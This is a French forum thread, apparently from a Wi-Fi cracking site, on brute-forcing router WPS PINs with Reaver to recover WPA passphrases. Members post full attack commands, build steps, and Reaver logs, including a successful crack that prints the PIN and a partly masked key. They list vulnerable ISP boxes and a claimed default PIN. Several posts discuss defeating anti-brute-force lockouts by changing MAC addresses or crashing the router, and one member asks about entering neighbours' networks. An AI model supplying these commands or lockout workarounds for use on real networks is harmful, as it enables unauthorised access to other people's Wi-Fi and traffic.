Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 29-12-2011 22:11:49

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

Depuis ce topic: Sécurité : la fonctionnalité WPS des routeurs remise en cause nous avons découvert qu'il était possible d'exploiter une faille sur les routeurs supportant la fonctionnalité WPS (lorsque cette dernière est activée bien sur). Ca y est, les tools pour bruteforcer le WPS Pincode et accéder à la passphrase WPA en quelques heures sont disponibles:

-Reaver-wps
-Wpscrack

Wpscrack serait un peu plus rapide que Reaver-wps, mais il ne fonctionnerait pas sur tous les points d'accès. Une version plus complète (mais payante) de Reaver est dispo ici: Reaver. Plus d'infos sur Reaver-wps: Cracking WPA in 10 Hours or Less.

Il serait intéressant de faire quelques tests et de se renseigner histoire de voir quels routeurs sont vulnérables. L'avantage avec ce genre d'outil c'est que la longueur de la passphrase WPA n'a aucune importance, tant que WPS est supporté et activé la passphrase sera trouvée après un bruteforce du code pin WPS!

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 30-12-2011 14:14:33

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

J'ai bien fais le tour de mon interface de configuration et il semble que le routeur de Zyxel "Xavi7968", Numéro de modèle "Solos 4610 RD" n'est pas vulnérable à cette attaque (pas de WPS)
Quel dommage... j'aurais tant voulu essayer le tool!
Mes félicitations à Craig Heffner y Stefan.
pam et re- pam sur les compagnies,

I reported this vulnerability to CERT/CC and provided them with a list of (confirmed) affected vendors. CERT/CC has assigned VU#723755 to this issue.
To my knowledge none of the vendors have reacted and released firmware with mitigations in place.

Ça ne nous étonne pas.... mad

Dernière modification par kcdtv (30-12-2011 14:21:14)

Hors Ligne

#3 30-12-2011 15:42:44

superbobo
Membre Indéboulonnable
Inscription : 15-11-2011
Messages : 139

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

Mouais, ça n'a pas l'air bien au point...

reaver -i mon0 -b 00:1D:6A:6B:2F:87 -c 6 -v

Reaver v1.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Waiting for beacon from 00:1D:6A:6B:2F:87
[+] Associated with 00:1D:6A:6B:2F:87 (ESSID: Livebox-4c0a)
Segmentation fault

EDIT: Je viens de tester avec la version SVN. La question du segfault a été reglée mais j'ai d'autres problèmes:

./reaver -i mon0 -b 00:1D:6A:6B:2F:87 -c 6 -v

Reaver v1.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Waiting for beacon from 00:1D:6A:6B:2F:87
[+] Associated with 00:1D:6A:6B:2F:87 (ESSID: Livebox-4c0a)
[+] 0.02% complete @ 16 seconds/attempt
[+] 0.05% complete @ 11 seconds/attempt
[+] 0.09% complete @ 6 seconds/attempt
[+] 0.13% complete @ 5 seconds/attempt
[!] WARNING: Detected AP rate limiting, waiting 315 seconds before re-trying
[!] WARNING: Detected AP rate limiting, waiting 315 seconds before re-trying
[!] WARNING: Detected AP rate limiting, waiting 315 seconds before re-trying
[!] WARNING: Detected AP rate limiting, waiting 315 seconds before re-trying

En tout cas, si certains veulent tester:

svn checkout http://reaver-wps.googlecode.com/svn/trunk
cd trunk
cd src
./configure
make

Voilà !

Dernière modification par superbobo (30-12-2011 16:19:19)

Hors Ligne

#4 30-12-2011 21:04:34

tbk-amine
Membre Radioactif
Lieu : sous ubuntu
Inscription : 07-08-2011
Messages : 91

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

bonjour
bravo au moins un progrès dans le monde du crack wifi

Hors Ligne

#5 30-12-2011 22:51:05

superbobo
Membre Indéboulonnable
Inscription : 15-11-2011
Messages : 139

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

sur Korben, où la news a aussi été publiée, plusieurs utilisateurs disent que le "sur la Livebox 2, non seulement le WPS est activé, mais en plus le code par défaut est "12345670".

Quelqu'un peut confirmer?

Hors Ligne

#6 30-12-2011 23:37:42

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

D'après les quelques renseignements que j'ai trouvé, les Livebox 2 et les Bbox seraient vulnérables. Il serait en effet intéressant d'avoir quelques retours de tests.

Une petite vidéo:

Cracking WPS with Reaver

La vulnerability note: WiFi Protected Setup PIN brute force vulnerability.

Hors Ligne

#7 31-12-2011 01:48:18

superbobo
Membre Indéboulonnable
Inscription : 15-11-2011
Messages : 139

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

Les BBox et Livebox sont protégées contre cette attaque: l'AP se vérouille pour quelques minutes voire quelques heures au bout de quelques tentatives de bruteforce (cf message d'erreur plus haut)
Par contre, je suis en train de tester l'attaque sur un routeur vulnérable. Jusqu'ici, ça marche, mais c'est très long: 10% à peine depuis 1h30. Je vous tiens au courant et je ferai des screenshots en cas de succès.

Hors Ligne

#8 31-12-2011 04:50:05

superbobo
Membre Indéboulonnable
Inscription : 15-11-2011
Messages : 139

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

Petit update: les auteurs viennent de rajouter une option dans la version SVN pour specifier le PIN à tester (./reaver -i nomdelinterface -p lepinatester -b bssid -vv). Si les livebox ont un pass par défaut (12345670 si j'ai bien compris), ça mérite d'être essayé.

Hors Ligne

#9 31-12-2011 10:49:13

yasmine
Membre Indispensable
Inscription : 22-01-2009
Messages : 630

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

superbobo a écrit :

......plusieurs utilisateurs disent que le "sur la Livebox 2, non seulement le WPS est activé, mais en plus le code par défaut est "12345670".

mais les ....E8:BE:81:xx:xx:xx sont des livebox 2 ??
ca veut dire que je peux (apres demander autorisation de mes voisins, ..) essayer de rejoindre leurs réseaux avec 12345670 ???

Hors Ligne

#10 31-12-2011 15:41:22

superbobo
Membre Indéboulonnable
Inscription : 15-11-2011
Messages : 139

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

Normalement oui si le pin par défaut n'a pas été changé. Quelqu'un pourrait-il tester avec sa livebox?

Hors Ligne

#11 31-12-2011 23:49:45

yenoM
N00b
Inscription : 31-12-2011
Messages : 1

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

J'ai testé la version 1.2 de Reaver-WPS sur des WPA2/PSK ou WPA de 5 LiveBox, avec les bonnes adresses MAC.
Ca ne fonctionne pas.

Soit j'ai des listes de "WARNING: Receive timeout occurred"...
Soit j'ai aussi des "WARNING: Detected AP rate limiting, waiting 315 seconds before re-trying" vers 0,07 % et après plus de 20 minutes, j'ai toujours le même message (anti brute-force ?)

J'ai aussi testé -p 12345670, et ça ne fonctionne pas non plus.

Il y a une histoire comme quoi l'option WPS de la Livebox 2 (activé par défaut) utiliserait la méthode "Push Button" et non la méthode "PIN Code"..
http://fr.wikipedia.org/wiki/Wi-Fi_Protected_Setup
A vérifier donc.

Hors Ligne

#12 01-01-2012 01:21:12

patraque
Nouveau membre
Inscription : 03-02-2011
Messages : 6

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

yenoM a écrit :

J'ai testé la version 1.2 de Reaver-WPS sur des WPA2/PSK ou WPA de 5 LiveBox, avec les bonnes adresses MAC.
Ca ne fonctionne pas.

Soit j'ai des listes de "WARNING: Receive timeout occurred"...
Soit j'ai aussi des "WARNING: Detected AP rate limiting, waiting 315 seconds before re-trying" vers 0,07 % et après plus de 20 minutes, j'ai toujours le même message (anti brute-force ?)

J'ai aussi testé -p 12345670, et ça ne fonctionne pas non plus.

+1 ... même constat pour moi ... 2012 rien de nouveau ... wink

BONNE ANNEE à tous

Dernière modification par patraque (01-01-2012 01:21:47)

Hors Ligne

#13 01-01-2012 02:36:18

superbobo
Membre Indéboulonnable
Inscription : 15-11-2011
Messages : 139

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

Je viens de réussir une attaque. Ca aura pris en tout et pour tout 22 heures.
La cible: un routeur belkin.
J'ai remarqué que l'attaque ne fonctionnait pas sur les Bbox et Livebox, qui sont en théorie vulnérables mais qui disposent d'un mécanisme de vérouillage qui s'active après de trop nombreux essais de PIN:"WARNING: Detected AP rate limiting". L'auteur de reaver en fait mention ("blocking mechanisms to prevent brute force attack") mais ne propose pas de solution. J'imagine que faire crasher la box de multiples fois réglerait le problème, mais c'est quand même vachement violent...

Pour en revenir au sujet, les screenshots parleront d'eux même: la passphrase était quasiment introuvable via une attaque par dico (nom commun suivi de 3 lettres aléatoires).

Voilà, good luck ! Et pour ce qui est du supposé pin par défaut des livebox, c'est une info qui revenait dans les commentaires de l'article sur korben, je n'ai pas voulu donner de faux espoirs.


Utile, pour connaître le constructeur à partir de l'adresse mac: http://www.coffer.com/mac_find/
99472524.jpg
75347281.jpg

Dernière modification par superbobo (01-01-2012 02:54:25)

Hors Ligne

#14 01-01-2012 11:58:41

noireaude
Membre d'honneur
Lieu : Chez le docteur
Inscription : 12-03-2010
Messages : 2 362
Site Web

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

Merci pour ton test superbobo, il confirme pas mal de choses wink.


L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

Hors Ligne

#15 01-01-2012 12:07:03

maribo
Membre Actif
Inscription : 13-05-2011
Messages : 39

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

maintenant j'ai une question:les wps sont-ils peut-etre fixe par rapport a la marque du routeur?ca serait enorme mais apres tout pq pas?!

Hors Ligne

#16 01-01-2012 17:12:39

underbreak
Nouveau membre
Inscription : 04-09-2011
Messages : 5

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

bonjour a tous,

je viens de tester sur ma bbox sagem (2011) et ca a fonctionné :

[+] 100.00% complete @ 4 seconds/attempt
[+] Key cracked in 15708 seconds
[+] WPS PIN: '5590xxxx'
[+] WPA PSK: '242XXXXXXX'
[+] AP SSID: 'Bbox-XXXXXX'

le probleme c'est que je ne voie pas comment desactiver le wps ...

PS : si on modifie l'adresse MAC en cours de bruteforce, genre apres chaque 2 ou 3 essais, la protection (WARNING: Detected AP rate limiting) saute ou pas ?

Dernière modification par underbreak (01-01-2012 17:16:51)

Hors Ligne

#17 01-01-2012 17:19:52

superbobo
Membre Indéboulonnable
Inscription : 15-11-2011
Messages : 139

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

underbreak: j'ai essayé de changer de mac, mais toujours le même message.
Par contre ton résultat sur la bbox est intéressant. T'as utilisé un parametre spécial via reaver pour eviter que le systeme se vérrouille? ou peut-être as-tu juste attendu entre chaque message "WARNING: Detected AP rate limiting"?

En tout cas, pour les Livebox (corrigez-moi si je me trompe), le vérouillage semble durer des heures...

Dernière modification par superbobo (01-01-2012 17:34:02)

Hors Ligne

#18 01-01-2012 17:31:13

underbreak
Nouveau membre
Inscription : 04-09-2011
Messages : 5

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

non rien de spécial, ma commande :

reaver -i mon0 -b BSSID_BBOX -vv

that's all

peut etre que les bbox 1ere generation ne sont pas compatibles ? tu as essayé avec un Bbox Sagem ?

Hors Ligne

#19 01-01-2012 17:33:41

Bilbo
Membre Hyperactif
Inscription : 31-12-2011
Messages : 45

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

Au début j'étais là à me dire: Top moumoutte pure laine, ma Livebox 2 incassable est enfin à ma portée! Bon j'ai quand même dû réactiver le WPS, qui est bien activé par défaut et dont le mot de passe par défaut est bien 12345670 si j'en crois l'interface admin.

EN REVANCHE! La boîte vivante semble blindée contre cette attaque également (décidément, Orange gère un peu trop bien sur ce coup :@)

Je vous explique ce qui me fait penser ça, ça pourra peut être servir à quelqu'un et surtout, j'espère me tromper.

Livebox configurée sur 802.11b/g/n avec WPA/WPA2 TKIP-AES, c'est à dire qu'il prendra WPA2-AES car mon ordi est compatible et est le seul connecté (sinon ça tombe en WPA-TKIP). A noter que je choisis pas l'option 802.11b/g  avec WPA-TKIP (histoire de dégager WPA2-AES, au cas où Reaver ne fonctionne pas dessus) car Backtrack n'arrive pas à se connecter correctement depuis Wicd... Peut être car il a l'air de croire qu'il est en WEP.

Bref depuis Backtrack 5 R1 booté depuis une clef USB j'ai donc lancé la commande svn pour télécharger Reaver (dernière révision r35), puis installé le tout avec le classique

./configure
make
make install

Puis je me déconnecte de la box et désactive/réactive le wifi de mon ordi. Ensuite:

airmon-ng start wlan0
(éventuellement:) airodump-ng mon0 --channel 6
reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv (éventuellement:) -p 12345670 -c 6 -e Livebox-XXXX

Et ça marche pas. Impossible de s'associer correctement à la boite, je reçois du boudin*.

Je tente donc la manip en m'étant d'abord légitimement connecté par Wicd et là, même s'il s'associe correctement, Reaver en mode ultra verbose n'arrive pas à cracker le WPS même si c'est le bon code pine 12345670. La Livebox serre les fesses après un certain nombre d'essais mais comme de toutes façons ça aurait dû marcher dès le premier, le problème ne vient pas du "lock"...
Ce qui me conduit à 3 hypothèses:
1) 12345670 n'est pas vraiment le bon code PIN et l'interface admin raconte nawak. J'en doute mais bon, pour vérifier il faudrait lancer l'attaque complète
2) La Livebox 2 ne répond aux WPS que par Push Button et non par l'interface extérieure, auquel cas elle est blindée contre cette attaque. (voir plus bas pour comprendre sur quoi se base cette hypothèse)
3) Reaver n'est pas (encore) compatible avec cette box, ou je me sers mal de l'outil


En utilisant Wireshark j'ai observé le contenu de ce que je pense être le beacon de base envoyé par la Livebox 2. Relatif au WPS, peut être à la config WPS de la box, on trouve ceci:
pushbutton.jpg
Seul Pushbutton semble activé, pas external truc.

Ensuite quand je lance Reaver avec le bon PIN tout en étant légitimement connecté par Wicd, Wireshark me montre ceci:
m4nack.jpg
On remarque que mon PC envoie une requête WPS M4 que la box "acknowledge" (bien que le champ source de ce paquet soit vide, la destination est mon PC; oui je sais j'ai foutu du noir partout vous voyez pas). Mon PC relance une M4, je sais pas si c'est normal ou pas toujours est il que la box (champ source pas vide cette fois) lui répond par NACK (Not ACKnowledged je parie), suivi peu après par un "Failure" dont on peut voir les détails sur l'image.

Je peux me tromper mais ces 2 images me laissent penser que la Livebox 2 est blindée contre les attaques WPS. Z'en pensez quoi?




* Pour les détails sur la fabrication du boudin, c'est à partir d'ici:

A part ça, j'ai quand même un autre problème: impossible d'associer Reaver correctement à la box sans être déjà connecté légitimement. Même avec l'attaque Fakeauth tournant dans une autre fenêtre ça change rien. Voilà les logs que me donne Reaver -vv, en gros:

~/trunk/src# reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv -c 6

Reaver v1.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

[+] Switching mon0 to channel 6
[+] Waiting for beacon from XX:XX:XX:XX:XX:XX
[+] Switching mon0 to channel 6
[+] Associated with XX:XX:XX:XX:XX:XX (ESSID: Livebox-XXXX)
[+] Trying pin 11098713
[!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: Livebox-XXXX)
[!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: Livebox-XXXX)
[!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: Livebox-XXXX)
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
(Suivi d'un paquet de ces 2 dernières lignes)
[!] WARNING: Receive timeout occurred

[+] Trying pin 11098713

[!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: Livebox-XXXX)
[!] WARNING: Receive timeout occurred
(Encore quelques time out)

[+] Trying pin 11098713

[!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: Livebox-XXXX)
[!] WARNING: Receive timeout occurred
(Encore quelques time out)

[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
(Un paquet de ces 2 lignes)

[+] Trying pin 11098713
[!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: Livebox-XXXX)
[!] WARNING: Receive timeout occurred
[!] WARNING: Receive timeout occurred
(Plein de time out)

On voit que le PIN essayé ne change même pas ce qui veut dire qu'il a probablement même pas pu être envoyé (ou que la réponse n'a jamais été reçue par le PC ou traitée par la box). A noter qu'en étant connecté légitimement le PIN change, même si l'attaque foire la box va jusqu'à se bloquer après X essais donc c'est bien un problème d'association.

Une idée de ce qui peut causer ça?

Dernière modification par Bilbo (01-01-2012 18:07:57)

Hors Ligne

#20 01-01-2012 17:46:14

superbobo
Membre Indéboulonnable
Inscription : 15-11-2011
Messages : 139

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

underbreak: effectivement, c'est une Thompson. Bon bah c'est cool ça ! On a la confirmation que ça marche sur les Bbox Sagem !!

Hors Ligne

#21 01-01-2012 17:53:20

superbobo
Membre Indéboulonnable
Inscription : 15-11-2011
Messages : 139

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

Bilbo: difficile de dire quoi que ce soit, j'ai pas de livebox sous la main là où je me trouve pour tester tout ça. En tout cas, le fait d'avoir 12345670 comme pin par défaut est quand même incroyable. Ca m'étonnerait pas que ta 2ème hypothèse soit la bonne, cad qu'ils aient trouvé un moyen pour que la box ne réponde qu'au "Push Button et non par l'interface extérieure".

Quelqu'un pourrait-il tester et voir s'il fait les mêmes observations?

Hors Ligne

#22 01-01-2012 18:18:06

Bilbo
Membre Hyperactif
Inscription : 31-12-2011
Messages : 45

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

Je changerai le code PIN la prochaine fois que j'essaierai, comme ça si 12345670 n'est pas le vrai mdp, mon nouveau devrait passer. Parce que je me vois pas bruteforcer ma Livebox vu comment elle sert les fesses (probablement plus de 315 secondes même si j'ai pas encore trop testé le délai), ça va prendre 3 plombes.


Underbreak, est ce que ton pass WPA est celui par défaut de la BBox? 242XXXXXXX. 10 caractères, que des chiffres? Si y'a pas de lettres ça fait "que" 10 milliards de possibilités, ça se force avec un dictionnaire numérique bien conçu. Je sens qu'il y a plein de lettres partout dans tes X :p


Superbobo: Tu as une Bbox Thomson? Dans ce cas tu es déjà vulnérable puisqu'on sait reproduire la clef WPA par défaut à partir du SSID par défaut smile
Malheureusement c'est la box la plus représentée en France qui est aussi la mieux sécurisée par défaut...la Livebox >_< (en tout cas la 2)

Dernière modification par Bilbo (01-01-2012 18:25:00)

Hors Ligne

#23 01-01-2012 18:26:02

underbreak
Nouveau membre
Inscription : 04-09-2011
Messages : 5

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

oui c'est le mot de passe par default et non c'est de l'hexadécimal (0123456789ABCDEF), en crackant le handshake j'y suis encore dans 1000 ans...

Hors Ligne

#24 01-01-2012 18:57:51

Bilbo
Membre Hyperactif
Inscription : 31-12-2011
Messages : 45

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

Dommage :p
Enfin il reste toujours l'attaque sur la clef WPA, même s'il me semble qu'elle ne fonctionne pas avec WPA2 ;_;
Et puis une Bbox Sagem devrait être totalement immunisée contre ça normalement.

Dernière modification par Bilbo (01-01-2012 18:58:38)

Hors Ligne

#25 01-01-2012 21:05:44

superbobo
Membre Indéboulonnable
Inscription : 15-11-2011
Messages : 139

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

Par curiosité, qu'est ce que tu veux dire par attaque sur la clé wpa?

Dernière modification par superbobo (01-01-2012 21:30:03)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
Quelle carte wifi choisir ? par Morpheus_Dotcom
2 104 05-12-2016 15:11:00 par Morpheus_Dotcom
8 300 17-11-2016 12:02:17 par koala
Problème reaver par Antho3674
4 305 15-11-2016 22:05:12 par kcdtv
Bruteforce WPS par regard48
8 404 15-11-2016 16:19:36 par Fab955
0 279 22-10-2016 19:03:48 par Antho3674

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.032 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]